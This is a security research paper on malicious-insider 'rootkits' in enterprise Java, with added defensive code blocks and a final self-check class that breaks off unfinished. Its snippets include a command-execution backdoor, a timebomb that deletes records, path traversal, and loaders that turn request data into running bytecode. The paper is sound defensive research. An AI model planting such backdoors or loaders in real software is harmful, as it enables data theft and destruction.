Enterprise Java Rootkits
"Hardly anyone watches the developers"

Jeff Williams, Aspect Security
jeff.williams@aspectsecurity.com
Twitter: @planetlevel
BlackHat USA, July 29, 2009

Aspect Security | www.aspectsecurity.com
Abstract
In a world with layoffs, outsourcing, and organized crime, the risk from malicious developers should be considered seriously. In "Byte Wars: The Impact of September 11 on Information Technology," Ed Yourdon cautions us to remember that "hardly anyone watches the programmers" [1].
How much would it cost to convince a developer to insert a few special lines of Java in your application? Would you detect the attack before it went live? How much damage could it do? In many ways malicious developers are the ultimate insiders. With a very small number of lines of Java, they can steal all your data, corrupt systems, install system level attacks, and cover their tracks. What's really scary is that a trojaned Struts or Log4j library could affect most of the financial industry all at once.
In this paper, we examine the techniques that malicious programmers can use to insert and hide these attacks in an enterprise Java application. We examine techniques for bootstrapping external attacks, avoiding code review, avoiding static analysis, trojaning libraries, and trojaning an enterprise build server. The point here is not to show how complex these attacks are, but rather how many opportunities there are and how simple and obvious they are to most developers.
The paper also presents several strategies for minimizing the risk to organizations from malicious Java developers. We evaluate the benefits and limitations of procedural controls, technical controls, and detection. In particular we focus on techniques for limiting the trust you grant developers through restricting APIs, establishing a trustworthy build process, and limiting trust in operation with the Java SecurityManager. We'll also discuss improving detection techniques such as code review and static analysis tools.
Businesses should be aware of these risks so that they can make informed decisions about their software supply chain, and even whether to automate certain business functions at all.

1. Introduction
Most enterprises have almost completely ignored the risk of malicious developers. The uncertainty and technical complexity of the issue combined with the advantages of moving businesses online often makes it difficult to reason about. In this section we discuss some of the risk factors that enterprises should consider in this area.
The Risk of Malicious Developers
How can we determine the risk associated with a renegade software developer? To approach the question we have to break down the likelihood and impact and compare them to other risks facing our enterprise.
Unfortunately, there is a stunning lack of information about this risk. All we can do is make conjectures about how easy these attacks are, how unlikely they are to be detected, and how big the payoff might be. Most software developers wouldn't even consider performing an attack like this. However, there is good evidence that organized crime is becoming increasingly sophisticated about cybercrime and it is hard to believe they would ignore this opportunity. Attacks like this have been popularized in movies such as War Games and Office Space, so it's fairly certain they could come up with the idea.
There have been two major studies that consider the risk related to software developed overseas. Both of them equivocate about this risk. One argues that "improvements in cyber security and software assurance will mitigate the risk of malicious code insertions" [2]. The other states that "a crafty, determined insider will be able to insert malicious hidden software code -- even with preventive measures in place" [3].
Are there any developers in your organization that would be tempted by a large payoff? What if someone offered them cash to insert malicious code into an enterprise? Any employee who gets into financial trouble is more likely to succumb to such an incentive.
To help understand the problem, this paper considers the difficulty of creating a successful exploit that is unlikely to be detected in a typical enterprise. The obvious conclusion is that it would be quite easy for a developer with even moderate skills to engineer one of these attacks, even with fairly sophisticated security processes in place.
In this paper, we explore the types of attack that a malicious developer might be able to perform. The conclusion is that a successful attack could easily reach all the data and functionality available to the targeted application, and might be able to reach other applications and infrastructure.
Therefore, on both counts, we are forced to conclude that when looking at an entire enterprise, malicious developers are both likely and very dangerous. Why then do most organizations follow the "we trust our developers" model and do virtually nothing to protect against this risk?
Too Dangerous to Discuss?
The initial reaction from some reviewers is that this paper may go too far in making techniques for malicious code available to hackers. While a legitimate concern, there are a few reasons that this topic is critically important to start exploring and understanding.
First of all, none of the techniques discussed in this paper are novel or even complicated. Only a few of the specific examples haven't been published anywhere before, and that's because they are completely obvious. The whole point of this paper is to demonstrate the huge variety of simple ways that a developer could completely undermine the security of an organization's application infrastructure.
Second, it is unfortunately clear that most organizations are not interested in critically evaluating the risk posed by malicious developers without concrete examples. Theoretical discussions on the topic have been and will likely continue to be roundly ignored. Also, just as we learn an incredible amount from actually implementing proper security controls [4], we similarly learn a great deal by actually trying to implement these attacks.
Finally, we need more research to learn about malicious programmers and understand this risk. On the one hand, new software technologies are critically important to improve productivity and our standard of living. On the other hand, this same importance drives the risk continuously upward. We need this research to better understand the likelihood and impact of these attacks. We also need new techniques for detecting, deterring, and preventing these attacks.
By ignoring the risks associated with software-enabling a business, the calculus is simple - going online always wins. We have already experienced one major meltdown in the financial markets based largely on ignoring unlikely but serious risks. Putting critical applications online without considering the malicious developer risk seems like something we need to discuss.
Who Is the Malicious Developer?
Any developer that writes code for your enterprise applications could cause you serious harm. This includes your internal developers as well as outsourced, open source, and commercial developers. You might include developers of services that you use, depending on how much you trust them.
Why would a developer write malicious code? They may have a grudge against the company, they may have a political or social agenda, or they may be funded by organized crime. How much money would it take to get a developer to introduce malicious code into their enterprise? Although there have not been any formal studies, it is safe to say that many would be tempted by less than $10,000 US.
And what would the return be? In most cases, there are almost no limits on the damage a malicious software developer could do. In most enterprises, there is an implicit assumption that the developers and the applications they produce are "trusted." Therefore, they are often hosted in a datacenter without separation from other applications, databases, and mainframes.
While there may be access control in place for users, there is typically no restriction on what developers may access. In this environment, the malicious developer has the opportunity to copy, corrupt, or delete all of the organization's data without a trace. In addition, they could control or deny service to critical business functions. Depending on the organization, they could use this access to steal money, download people's personal information to sell it, perform stock transactions, plant backdoors for later, or create a timebomb.
Simple Malicious Enterprise Code Examples
Many enterprises have hundreds or thousands of applications totaling millions of lines of code. Many attacks can be performed in only a few lines of code. For example, consider the amount of servlet code required to steal any file off the file system of the application host.
    protected void doGet( HttpServletRequest req, HttpServletResponse resp ) throws IOException {
        // the "x" parameter is used directly as a path, so any readable file can be requested
        String x = req.getParameter( "x" );
        BufferedReader r = new BufferedReader( new FileReader( x ) );
        while ( ( x = r.readLine() ) != null ) resp.getWriter().println( x );
    }

Even trivial obfuscation makes this attack unlikely to be noticed in the typical development process. The attacker below has made it seem that the point of the code is to set a CSS color from the user's preference. However, it uses a legitimate-looking validate() method which is really malicious. The validate() method tests if the color is a valid file, and if so returns the full content of the file to expose in the HTML output.
    // setup default background color, using default if necessary
    String color = request.getParameter( "color" );
    out.println( "style=\"color: " + validate( color, DEFAULT_COLOR ) + "\"" );

    http://www.example.com?color=../../../../../etc/passwd

To show some of the possible impacts of malicious code in a Java enterprise environment, below are some simple examples of malicious Java code. Very little attempt has been made to obfuscate these attacks. These examples could be made into rootkits if they were disguised with the techniques described later in this paper.
Over 10 years ago, the author uncovered a simple "Easter egg" in an Internet-facing business web application for a major U.S. corporation. In that application, if you typed the developer's name into the zip code field, you got a special page dedicated to how much of a genius the developer is. While the attack in that example was not at all damaging, it shows just how easy these attacks are. For example, the developer could have made the attack much more dangerous by invoking the command shell, as shown below.
    // null-safe comparison so ordinary requests without the parameter are unaffected
    if ( "C4A938B6FE01E".equals( request.getParameter( "backdoor" ) ) ) {
        Runtime.getRuntime().exec( request.getParameter( "cmd" ) );   // throws IOException
    }

If a malicious developer wants to leave a lasting impression at a corporation, they can create a timebomb. In the example below, the attack is launched anytime the application is run after September 11, 2009. The attack consists of starting a thread that deletes random records from a database table on a random schedule. This type of data destruction or modification is difficult to reconstruct because it can happen over a long period of time.
    // c is an open java.sql.Connection already held by the application
    if ( System.currentTimeMillis() > 1252641600000L ) // Sept. 11, 2009
        new Thread( new Runnable() { public void run() {
            Random sr = new SecureRandom();
            while ( true ) {
                // delete one record chosen at random
                String query = "DELETE FROM data WHERE id = " + sr.nextInt();
                try {
                    c.createStatement().executeUpdate( query );
                    Thread.sleep( sr.nextInt( 3600000 ) );   // wait a random interval of up to an hour
                } catch ( Exception e ) {}
            }
        }}).start();

Perhaps the most difficult to find attacks are the ones that require an understanding of the business logic in order to identify. Imagine a simple business rule like "only one coupon allowed at a time." The developer implementing this code could allow an attacker to redeem multiple coupons on transactions for more than $100. This implementation looks reasonable to the typical security code reviewer, but is not what was intended by the business and could cost them significantly. Other business rule issues can be significantly more damaging.
A developer can do plenty of damage without leaving the Java environment. They can affect business rules, corrupt data, or disclose data. Certainly though, the damage can be far worse if the exploit leaves the Java environment and accesses the operating system directly. With such access, the developer can certainly do anything the application can do, and potentially quite a bit more.
These are just a few of the damaging things that a malicious developer might introduce into an enterprise web application. The lack of constraints on the vast majority of code that runs in the enterprise affords a staggering opportunity for miscreants. To make matters worse, typical enterprise Java environments have many powerful libraries available to make this kind of attack easy to perform and easy to obscure.
About Java Enterprise Rootkits
According to Wikipedia, "A rootkit is a software system that consists of a program or combination of several programs designed to hide or obscure the fact that a system has been compromised." So a rootkit isn't the actual exploit, it's the code that hides the exploit.
We're using the term "Java Enterprise Rootkit" to describe malicious code in an enterprise Java application that uses techniques to hide from both manual code review and static analysis, obfuscate data exfiltration, and avoid detection in logs or other intrusion detection mechanisms.
Malicious code is not the same as a vulnerability. Most inadvertent vulnerabilities are introduced by programmers who weren't trained in secure coding or didn't have the right enterprise security API available [4]. Malicious code, on the other hand, is sabotage - it just causes harm directly. Malicious code intentionally avoids security controls. Rootkit techniques make this malicious code very difficult to find in an application.
In this paper, we will assume a malicious developer with only normal ability to change code in the software baseline of a Java EE application. We'll also assume a typical enterprise Java environment - one that runs without a SecurityManager [5,6,7,8] - although many of the examples would not be affected by a sandbox.
Even assuming a rootkit could evade detection by both tools and humans, some attacks require getting data out of the enterprise. Avoiding detection of data leaving the network is a challenge for rootkit developers, who can hide data in other protocols, use steganography, timing channels, and many other techniques. While this is an important topic for malicious developers, it has been well covered elsewhere.
In the following sections, we consider how a malicious developer can hide a rootkit from both human and automated reviews, and how such an attack might be delivered. The sections in this paper are not intended to be ironclad categories of techniques, as a successful attack will likely combine a number of different techniques.
Plausible Deniability
A primary goal for malicious developers is to avoid detection. But if their rootkit is detected, they want a plausible case that the code was an innocent mistake and not a malicious attack.
This means that the best attacks are the ones that look just like the typical vulnerabilities we find in code all the time: authentication problems, access control problems, command injection, SQL injection, etc. In fact, many times, the biggest security holes are not in the code at all. They are flaws due to the lack of a security control where there should be one.
In the example below, the Struts action does not check that the requested acctid is associated with the user making the request, allowing an attacker to forge a request and update someone else's account. Sometimes the dogs that don't bark are the hardest thing to notice [9].
    import java.io.IOException;
    import javax.servlet.ServletException;
    import javax.servlet.http.*;
    import org.apache.struts.action.*;

    public class UpdateAccountSubmit extends Action {

        public ActionForward execute( ActionMapping mapping, ActionForm form,
                HttpServletRequest request, HttpServletResponse response )
                throws IOException, ServletException {
            DynaActionForm accountForm = (DynaActionForm) form;
            String acctid = (String) accountForm.get( "acctid" );
            // nothing ties acctid to the authenticated user: the missing check is the flaw
            User user = getUserService().load( acctid );
            if ( user == null ) {
                ActionErrors errors = new ActionErrors();
                errors.add( ActionErrors.GLOBAL_ERROR, new ActionError( "message.notfound" ) );
                saveErrors( request, errors );
                return mapping.findForward( "failure" );
            }
            user.update( request );
            request.setAttribute( "user", user );
            return mapping.findForward( "success" );
        }
    }

A malicious developer also might introduce a subtle flaw that code analysis might miss. In this case, the reviewer would have to recognize that the following code has something to do with access control and that it could fail open. If the user fails to provide a "resource" parameter, the code will throw a NullPointerException and fall through to the business function.
    Resource resource = lookup( request.getParameter( "resource" ) );
    try {
        // a null resource throws NullPointerException here, which the catch below swallows
        if ( !request.isUserInRole( resource.getRequiredRole() ) ) {
            logger.warn( "Unauthorized request for resource" );
            return;
        }
    } catch ( Exception e ) {}
    ...
    // continue with business function
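As an added example (not code from the paper), here is the fail-open check above beside a fail-closed rewrite, exercised against a stubbed HttpServletRequest built with java.lang.reflect.Proxy. Resource and lookup() are stand-ins for the application's own types, and the servlet API jar is assumed to be on the classpath.

```java
import java.lang.reflect.Proxy;
import java.util.*;
import javax.servlet.http.HttpServletRequest;

public class ResourceGuard {

    /** Stand-in for the application's Resource type (an assumption, not from the paper). */
    static final class Resource {
        private final String requiredRole;
        Resource(String requiredRole) { this.requiredRole = requiredRole; }
        String getRequiredRole() { return requiredRole; }
    }

    /** Stand-in lookup: only "report" is known; anything else, including null, yields null. */
    static Resource lookup(String name) {
        return "report".equals(name) ? new Resource("manager") : null;
    }

    /**
     * FAIL-OPEN, as in the paper: a missing "resource" parameter makes lookup() return null,
     * resource.getRequiredRole() throws NullPointerException, the empty catch swallows it,
     * and control reaches the business function as if the role check had passed.
     */
    static boolean allowedFailOpen(HttpServletRequest request) {
        Resource resource = lookup(request.getParameter("resource"));
        try {
            if (!request.isUserInRole(resource.getRequiredRole())) {
                return false;
            }
        } catch (Exception e) { }
        return true;
    }

    /**
     * FAIL-CLOSED: deny is the default, every precondition is checked explicitly,
     * and an exception anywhere in the decision is a denial rather than a pass.
     */
    static boolean allowedFailClosed(HttpServletRequest request) {
        String name = request.getParameter("resource");
        if (name == null || name.isEmpty()) return false;
        Resource resource = lookup(name);
        if (resource == null || resource.getRequiredRole() == null) return false;
        try {
            return request.isUserInRole(resource.getRequiredRole());
        } catch (RuntimeException e) {
            return false;
        }
    }

    /** Minimal HttpServletRequest stub: only getParameter and isUserInRole are implemented. */
    static HttpServletRequest stubRequest(Map<String, String> params, Set<String> roles) {
        return (HttpServletRequest) Proxy.newProxyInstance(
                HttpServletRequest.class.getClassLoader(),
                new Class<?>[] { HttpServletRequest.class },
                (proxy, method, args) -> {
                    switch (method.getName()) {
                        case "getParameter": return params.get((String) args[0]);
                        case "isUserInRole": return roles.contains((String) args[0]);
                        default: throw new UnsupportedOperationException(method.getName());
                    }
                });
    }

    public static void main(String[] args) {
        Set<String> noRoles = Collections.emptySet();
        // constructed requests: parameter omitted, wrong role, correct role
        HttpServletRequest missing = stubRequest(Collections.emptyMap(), noRoles);
        HttpServletRequest noRole = stubRequest(Collections.singletonMap("resource", "report"), noRoles);
        HttpServletRequest manager = stubRequest(Collections.singletonMap("resource", "report"),
                Collections.singleton("manager"));

        System.out.println("missing param  fail-open=" + allowedFailOpen(missing)
                + "  fail-closed=" + allowedFailClosed(missing));
        System.out.println("wrong role     fail-open=" + allowedFailOpen(noRole)
                + "  fail-closed=" + allowedFailClosed(noRole));
        System.out.println("correct role   fail-open=" + allowedFailOpen(manager)
                + "  fail-closed=" + allowedFailClosed(manager));
    }
}
```

The first line of output is the one a reviewer should care about: with the parameter missing, the fail-open version grants access and the fail-closed version denies it, while both agree on the two well-formed requests.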

A good strategy for establishing plausible deniability is to create overpowerful functions that have a legitimate use. For example, if the code requires reading in a file, why not make a readFile() function that is available to everyone? If you have to load plugins, why not create a custom classloader that converts bytes into code? Once these overpowerful functions are available, the amount of code required for a rootkit becomes extremely small.
Another technique is to avoid accountability for the malicious code. There are many ways to get malicious code onto the classpath of an application. If the rootkit can be added to a library that is automatically included in the application, or in part of the platform, the accountability for the code may be lost. What if developers can put code into other developers' environments? Or accountability is not well enforced in the source code control system?
If the attack is loaded at runtime, many people think that attacks will be captured in application logs. There are two major problems with this assumption. First, the state of application logging for security is generally very weak. Many applications don't even log security failures like bad input, failed access control checks, or attempts to bypass authentication. Second, even if that logging were in place, malicious code would specifically avoid the logs. There would be no record of the malicious activity anywhere.
2. Turning Data into Code
The simplest type of malicious code directly performs an attack. But there is a more sophisticated type of malicious code that bootstraps an attack that is loaded from an external source. In this section we discuss techniques for loading and executing arbitrary code into the Java VM.
The attacker can hide the data within the application, or can send the data in from the outside. Within the application, data can be stored in a string, a byte array, the file system, a database, or a million other places. Enterprise Java applications also accept data from web users, web services, gateways, partners, mainframes, and more. Either way, the attacker needs to convert that data into a malicious payload and execute it.
There are many ways for a malicious developer to design a trigger or data input that would be virtually impossible to detect: strange header values, arbitrary header names, patterns in parameter values, etc. Even case sensitivity or spaces between characters can be used. Timing channels can be used to stream data into an application over time as well. For example, the number of seconds between requests might represent the next byte in a malicious payload being assembled.
Once the attack has been sent into the application, techniques to turn that data into code are key components in many different forms of rootkits. They help to frustrate analysis by both human code reviewers and automated tools.
Abusing the Java Compiler API
One obvious way is to use the Java compiler API to compile an attack class. This API is only available in the JDK, not the JRE. However, most enterprise Java EE production environments do run on the JDK, because they need to be able to compile JSP files. One of the cardinal rules of hardening is to make sure that compilers are not available to attackers, yet an extremely powerful compiler API is available in most production Java applications. Precompiling JSPs with jspc and running on a JRE can help to avoid this problem.
In the example below, the Java compiler API is invoked to compile a string containing a very short program. The program searches the classpath for the first available directory in which to write class files. Classes could be written to jar files as well, but it would require a few more lines of code. Once the class is compiled and put on the classpath, the class is loaded by executing a Class.forName() call. The payload is in a static initializer so that it will run as soon as the class is loaded.
    import java.io.File;
    import java.net.URI;
    import java.util.*;
    import javax.tools.*;

    public class Compiler {

        // source of the attack class; the payload sits in its static initializer
        private static String code =
            "public class NotepadLauncher{" +
            "static {" +
            "try { Runtime.getRuntime().exec(\"notepad.exe\"); }" +
            "catch( Exception e ) {}}}";

        public static void main( String[] args ) throws Exception {
            JavaCompiler compiler = ToolProvider.getSystemJavaCompiler();
            // find the first classpath entry that is a directory and write the class file there
            String out = ".";
            String cp = System.getProperty( "java.class.path" );
            List<String> entries = Arrays.asList( cp.split( File.pathSeparator ) );
            for ( String entry : entries ) {
                File f = new File( entry );
                if ( f.isDirectory() ) { out = entry; break; }
            }
            List<String> opt = Arrays.asList( "-d", out );
            SourceFile sf = new SourceFile( "NotepadLauncher.java", code );
            compiler.getTask( null, null, null, opt, null, Arrays.asList( sf ) ).call();
            // loading the freshly compiled class runs its static initializer
            Class.forName( "NotepadLauncher" );
        }
    }

    // wraps a String of source so the compiler can read it without a file on disk
    class SourceFile extends SimpleJavaFileObject {
        String code = null;
        SourceFile( String filename, String sourcecode ) {
            super( URI.create( "string:///" + filename ), Kind.SOURCE );
            code = sourcecode;
        }
        public CharSequence getCharContent( boolean ignoreEncodingErrors ) {
            return code;
        }
    }
Abusing the JSP Compiler
It is also possible to use the JSP compiler to do the same thing. The attacker can either invoke the JSP compiler programmatically, or they can simply write a file anywhere in the webapp directory (except within WEB-INF). The attacker can then access the JSP with a normal web request from the outside, or could forward a request to the malicious JSP. The file can be deleted after the attack to remove the evidence. The string containing the exec() call could be passed in as a parameter or hidden elsewhere.
    // the file must land under the webapp root so the container will compile and run it
    File f = new File( getServletContext().getRealPath( "/file.jsp" ) );
    FileWriter fw = new FileWriter( f );
    fw.write( "<html><body><% Runtime.getRuntime().exec( \"calc\" ); %></body></html>" );
    fw.close();
    request.getRequestDispatcher( "/file.jsp" ).forward( request, response );
    f.delete();
Abusing the ClassLoader
An attacker can also use a custom classloader to turn bytes into executable code. The private final native defineClass() method in the Java classloader is what actually turns an array of bytes into an executable Class. Even though this method is not directly accessible because it is private and final, defineClass() can be exposed by extending ClassLoader and adding a method that delegates to defineClass. This can be done in a single line of code, as shown below.
In the example, an anonymous inner ClassLoader is created that exposes a method named "x" which returns the new Class. The ClassLoader.x() method is invoked with an array of bytes that contains the bytecode of a malicious Java class file. This creates the Class, which is not initialized until the newInstance() call is invoked. The attack is in the static initializer of the newly created class, where the attacker stored the malicious code.
    // b holds the raw bytes of a class file
    new ClassLoader() { Class x( byte[] b ) {
        return defineClass( null, b, 0, b.length ); } }.x( b ).newInstance();

Although the use of ClassLoaders can be controlled with the Java sandbox and it is something that might stand out to both automated tools and a manual code reviewer, they are frequently not controlled as they are needed for legitimate purposes such as supporting plugins and hotfixes to applications.
To use the malicious classloader, the attacker needs to get the bytes of a malicious class file into the application so they can be loaded and run. One easy way to do this is to store them in a Base64 encoded string and then decode them into a byte array. First we need a malicious class file such as the one below.
    public class ExecStatic {
        static {
            try {
                Runtime.getRuntime().exec( "notepad" );
            } catch ( Exception e ) {}
        }
    }

Then we need a tool that will write out the bytes of this simple class as a base64 encoded string. The tool below does just that.
    import java.io.*;
    import java.nio.file.Files;
    import java.util.Base64;

    /* Program to write out the bytes of a class file as a single-line Base64 string */
    public class Dumper {
        public static void main( String[] args ) throws Exception {
            for ( String name : args ) {
                // read the raw bytes; a FileReader would decode them as characters and corrupt the class file
                byte[] bytes = Files.readAllBytes( new File( name ).toPath() );
                // java.util.Base64 (Java 8+) replaces the unsupported sun.misc.BASE64Encoder of 2009
                String encoded = Base64.getEncoder().encodeToString( bytes );
                System.out.println( encoded );
            }
        }
    }

> java Dumper Attack.class

To exploit this approach, the malicious developer would put the following code somewhere in their servlet or in a JSP, and then they send a request containing the Base64 encoded attack bytecode. The attack will get loaded and run by the classloader, and the notepad will be launched.
    public void doGet( HttpServletRequest req, HttpServletResponse resp ) throws Exception {
        byte[] b = Base64.getDecoder().decode( req.getParameter( "x" ) );
        new ClassLoader() { Class x( byte[] b ) {
            return defineClass( null, b, 0, b.length ); } }.x( b ).newInstance();
    }

    http://www.example.com/servlet?x=yv66vgAAADIAIA...

Abusing the Java Instrumentation API
Java 5 added the Java Instrumentation API, which allows a developer to provide "Java agents" that can inspect and modify the byte code of the classes as they are loaded. In Java 5, this had to be specified on the command line that launched the Java VM. However, in Java 6 it became possible to add these agents programmatically as well as "hotpatch" classes that are already loaded. This affords the malicious developer an opportunity to modify almost any class, spy on the runtime, and execute arbitrary code.
In the example below, the attacker's code trojans a class file as above, generates a jar file containing an "agent," looks up the process id of the current VM and attaches the agent to it. The agent grabs the trojaned replacement class and does a "hotpatch" on the running VM. In this case, the behavior of the String.toString() method is replaced with one that additionally launches the Windows "notepad" program.
    import java.io.File;
    import java.lang.management.ManagementFactory;
    import java.util.Properties;
    import com.sun.tools.attach.VirtualMachine;

    public class Attacher {
        // shared with SpecialAgent, which runs inside this same VM
        private static String name;
        private static byte[] bytes;
        public static String getName() { return name; }
        public static byte[] getBytes() { return bytes; }

        public static void main( String[] args ) throws Exception {
            // Test out the "before" behavior
            System.out.println( new Innocent() );

            // Build the Agent jar (JarWriter is a small helper class, not shown)
            String jarpath = "C:/jars/SpecialAgent.jar";
            Properties p = new Properties();
            p.setProperty( "Main-Class", "SpecialAgent" );
            p.setProperty( "Manifest-Version", "1.0" );
            p.setProperty( "Agent-Class", "SpecialAgent" );
            p.setProperty( "Can-Retransform-Classes", "true" );
            p.setProperty( "Can-Redefine-Classes", "true" );
            p.list( System.out );
            File f = new File( "bin/SpecialAgent.class" );
            JarWriter.writeJar( JarWriter.readFile( f ), p, jarpath );

            // Make a modified class file and set it where the Agent can find it
            // (Bcel is a helper built on Apache BCEL, not shown)
            name = "Innocent";
            bytes = Bcel.trojan( "bin/Innocent.class", "toString" ).getBytes();

            // Get the process id of this VM and attach the Agent
            String pid = ManagementFactory.getRuntimeMXBean().getName().split( "@" )[0];
            VirtualMachine vm = VirtualMachine.attach( pid );
            vm.loadAgent( jarpath );
            vm.detach();

            // Test out the "after" behavior
            System.out.println( new Innocent() );
        }
    }

The agent itself simply takes the new bytes and replaces the existing class with them.
    import java.lang.instrument.ClassDefinition;
    import java.lang.instrument.Instrumentation;

    public class SpecialAgent {
        // agentmain() runs when the agent is loaded into an already-running VM
        public static void agentmain( String agentArgs, Instrumentation inst ) {
            try {
                Class c = Class.forName( Attacher.getName() );
                inst.redefineClasses( new ClassDefinition( c, Attacher.getBytes() ) );
            } catch ( Exception e ) {}
        }
    }

Using this technique, the behavior of any class or method can be entirely changed. This includes system classes like String, but not primitive classes like int.class. The only restriction is that the basic signatures must remain the same. The agent can do almost anything. Sensitive data can be disclosed or changed, any security mechanisms can be bypassed, any users might be denied service, and any system activity can be monitored. There are just no limits to what this malicious technique could be used for. In fact, we may be able to use it to help security, by implementing taint tracing and other checks.
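As a defensive counterpart to the compiler API and self-attach sections above, here is an added start-up self-check (not code from the paper) that reports the runtime preconditions those two techniques rely on, plus the absence of a SecurityManager. The jdk.attach.allowAttachSelf property is the JDK's documented switch for self-attachment since Java 9; the class name and the wording of the findings are assumptions.

```java
import java.io.File;
import java.util.ArrayList;
import java.util.List;
import javax.tools.ToolProvider;

public final class RuntimeHardeningCheck {

    /** True when javax.tools can hand out a compiler, i.e. the application runs on a JDK rather than a JRE. */
    static boolean compilerAvailable() {
        return ToolProvider.getSystemJavaCompiler() != null;
    }

    /** Major Java version: 8 for "1.8", 11 for "11", and so on. */
    static int javaMajorVersion() {
        String spec = System.getProperty("java.specification.version");
        if (spec.startsWith("1.")) spec = spec.substring(2);
        return Integer.parseInt(spec);
    }

    /**
     * True when this JVM may load an agent into itself, which is what the Attacher example needs.
     * Java 8 always allows it; since Java 9 it is off unless -Djdk.attach.allowAttachSelf
     * (empty or "true") was passed on the command line.
     */
    static boolean selfAttachAllowed() {
        if (javaMajorVersion() < 9) return true;
        String s = System.getProperty("jdk.attach.allowAttachSelf");
        return "".equals(s) || Boolean.parseBoolean(s);
    }

    /** Classpath entries that are writable directories: the Compiler example drops its class file into the first one. */
    static List<String> writableClasspathDirs() {
        List<String> dirs = new ArrayList<>();
        for (String entry : System.getProperty("java.class.path").split(File.pathSeparator)) {
            File f = new File(entry);
            if (f.isDirectory() && f.canWrite()) dirs.add(f.getAbsolutePath());
        }
        return dirs;
    }

    /** Collects human-readable findings; an empty list means none of the checked preconditions hold. */
    static List<String> findings() {
        List<String> out = new ArrayList<>();
        if (compilerAvailable())
            out.add("Java compiler API is available: run on a JRE or precompile JSPs with jspc");
        if (selfAttachAllowed())
            out.add("self-attach of agents is allowed: use Java 9+ and do not set jdk.attach.allowAttachSelf");
        if (System.getSecurityManager() == null)   // deprecated from Java 17 on, but still reports the state
            out.add("no SecurityManager installed: reflection and classloader creation are unrestricted");
        for (String d : writableClasspathDirs())
            out.add("writable directory on classpath: " + d + " (make it read-only for the application user)");
        return out;
    }

    public static void main(String[] args) {
        List<String> f = findings();
        if (f.isEmpty()) {
            System.out.println("no findings");
            return;
        }
        for (String s : f) System.out.println("FINDING: " + s);
        System.exit(1);   // fail fast so a hardened deployment does not start in this state
    }
}
```

Wire it into the application's start-up path (or a deployment smoke test) so a build that slips back onto a JDK, or a deployment that opens self-attach, is caught before it serves traffic.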
Other Techniques
This should not be considered an exhaustive list; these are just the examples that seemed the most obvious. There are very likely to be other ways to turn data into code within the typical Java enterprise environment. Aspect oriented programming is a possibility if the tools are present.
3. Hiding from Human Code Reviewers
Humans tend to be better than tools at understanding the context of code, and identifying attacks related to the meaning of the code. On the other hand, humans have many weaknesses when it comes to reviewing code. Human limitations on speed, vigilance, and comprehension all provide opportunities for malicious developers to bypass code review. In addition, the human desire to find meaning may be a distraction in many cases. While an innocent programmer would not intentionally mislead a human reviewer with method names, variable names, comments, and idioms, the creator of a rootkit would almost certainly use all of those techniques.
In this section we consider several techniques for obfuscating malicious code from human code reviewers and establishing plausible deniability.
Abusing Method Names, Variable Names, and Comments
Code reviewers are only human, and they are susceptible to misleading information in the code. In the example below, the attacker has embedded a call to malicious code inside the toString() method, which is frequently invoked. Although only a static String is referenced, the actual attack is hidden inside the static initializer of the T class, which runs when the class is loaded.
public String toString() {
// initialize the frapjamminer STR10349 tla 03-13-2006
// referencing T.PREFIX loads T and runs its static initializer; this only holds if
// PREFIX is not a compile-time constant, which javac would inline without loading T
return T.PREFIX + ":" + myState;
}

The toString() method is not one that most code reviewers would spend a lot of time on, because the contract for the method is to simply return a string representing the object. A reviewer would not expect a malicious side effect inside a toString(). Also, because many of the built-in Java runtime classes call methods like toString(), hashCode(), and equals() automatically, they are not always called directly from within the application. This helps to hide these calls from control flow analysis.
Abusing Reflection (Part 1)
There are many ways to hide Strings in Java, but most developers and code reviewers believe that a String cannot be changed once assigned. They are widely considered to be immutable. However, because most enterprises run without a SecurityManager to control reflection, even Strings declared final and private can be changed [10].
In the method below, the private "value" field of the String class is made accessible through reflection. Then the value is set to the replacement characters and the length is updated. This innocent looking code can be buried anywhere in a software baseline and could easily be overlooked by code reviewers.
// requires java.lang.reflect.Field
public static void changeString(String original, String replacement)
{
try
{
// make the private backing array of java.lang.String writable; nothing stops this
// unless a SecurityManager (or, on current JDKs, strong encapsulation) forbids it
Field value = String.class.getDeclaredField("value");
value.setAccessible(true);
value.set(original, replacement.toCharArray());
// "count" exists only in the JDK 6-era String layout (value/offset/count)
Field count = String.class.getDeclaredField("count");
count.setAccessible(true);
count.set(original, replacement.length());
}
catch (Exception ex) {}
}

Imagine if this method's signature were "public static String append( String a, String b)": a malicious developer could use this call anywhere in their code to change the value of an arbitrary String. In the example below, the static final CMD is changed from the harmless "ls" command to the damaging "rm -rf /" command.
public static final String CMD = "ls";

// normally this command would be safe
Runtime.getRuntime().exec( CMD );

// unless a developer anywhere else in the code calls changeString
changeString( Utils.CMD, "rm rf /" );
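As an added defensive check, not code from the paper: a startup self-test that probes whether the first step of changeString() would succeed in the running JVM, and lists the launch flags that would reopen java.lang on a JDK that otherwise blocks it. It relies only on the standard library; the argument list in main() is constructed.

```java
import java.lang.management.ManagementFactory;
import java.lang.reflect.Field;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;

/*
 * Startup self-check answering the question changeString() raises: can code in
 * this process open java.lang.String's private fields? It also reports the
 * launch flags that would re-enable such access on a JDK that blocks it.
 */
public class StringReflectionCheck {

    /* Launch options that weaken strong encapsulation (JDK 9 and later). */
    private static final String[] WEAKENING_PREFIXES = { "--add-opens", "--add-exports", "--illegal-access" };

    /*
     * Repeats only the first step of changeString(): look up String.value and make it
     * accessible. True means a changeString()-style rewrite is possible in this process.
     *   JDK 8 and earlier: true unless a SecurityManager denies it
     *   JDK 9 to 15:       true by default (--illegal-access=permit), with a warning on stderr
     *   JDK 16 and later:  false unless launched with --add-opens java.base/java.lang=ALL-UNNAMED
     */
    public static boolean canOpenStringValue() {
        try {
            Field value = String.class.getDeclaredField("value");
            value.setAccessible(true);
            return true;
        } catch (RuntimeException e) {
            // InaccessibleObjectException (strong encapsulation) or SecurityException (SecurityManager)
            return false;
        } catch (NoSuchFieldException e) {
            return false;
        }
    }

    /* changeString() also assumes a "count" field, present only in the JDK 6-era
       value/offset/count layout. JDK 7u6 removed it (the char[] swap still takes effect
       there, since it runs first); JDK 9 changed value to a byte[], so the char[]
       assignment is rejected even where access is open. */
    public static boolean hasCountField() {
        try {
            String.class.getDeclaredField("count");
            return true;
        } catch (NoSuchFieldException e) {
            return false;
        }
    }

    /* JVM input arguments (the RuntimeMXBean view, which includes JAVA_TOOL_OPTIONS)
       that start with a weakening prefix. An empty list is the expected state. */
    public static List<String> weakeningFlags() {
        return weakeningFlags(ManagementFactory.getRuntimeMXBean().getInputArguments());
    }

    /* Matching logic split out so it can be exercised on a constructed argument list. */
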